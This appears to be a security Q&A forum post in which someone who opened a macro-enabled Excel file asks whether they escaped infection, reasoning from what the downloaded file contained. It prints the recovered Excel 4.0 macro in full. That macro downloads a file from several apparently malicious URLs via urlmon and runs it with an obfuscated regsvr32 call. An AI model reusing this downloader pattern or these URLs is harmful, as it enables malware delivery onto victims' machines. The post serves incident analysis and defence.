# Opened compromised Excel file - am I safe?

Tags: trojan, malware-analysis, excel, macro

Long story short, got duped into opening an XLSM in Excel, with macros being enabled. Realised instantly.

Digged into the Excel structure, found the following (extremely obfuscated) payload:

```
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/l55mri/Pl9TE5LYUHTCpuglHEkP/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/l55mri/Pl9TE5LYUHTCpuglHEkP/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/ofoed/ZHGzF/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/wp-content/Gzza9KkuuCa/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/portal/e6Ga3Y9/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XFRV7L84/Gtb9BR0M/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
```

When access, the malicious URLs contain the following contents:

- **onlinebrandedcontent:** Standard Apache file index page with no contents
- **onlyfansgo:** Boilerplate hosting provider "Account Suspended" page with no inclusions or Javascript.
- **marcoantonioguerrerafitness/acceptanceh/gloselweb:** Presumably malicious DLL file

I located `enu.ocx` on my machine. Creation timestamp is correct, ~5kb file size. To my relief, the contents are identical to the **onlyfansgo** "Account Suspended" HTML file.

So, on the surface of it, it looks like the macro got as far as the **onlyfansgo** HTML file instead of the malicious DLL payload, and then presumably tried to execute it using `regsvr32.exe` (which would have failed).

My question: Is it likely I dodged a bullet? And if so, why did the macro stop at the HTML file instead of continuing to the other malicious URLs (i.e. what in that `urlmon` call below would have assumed the HTML file was a valid payload, but not the earlier **onlinebrandedcontent** Apache index HTML)?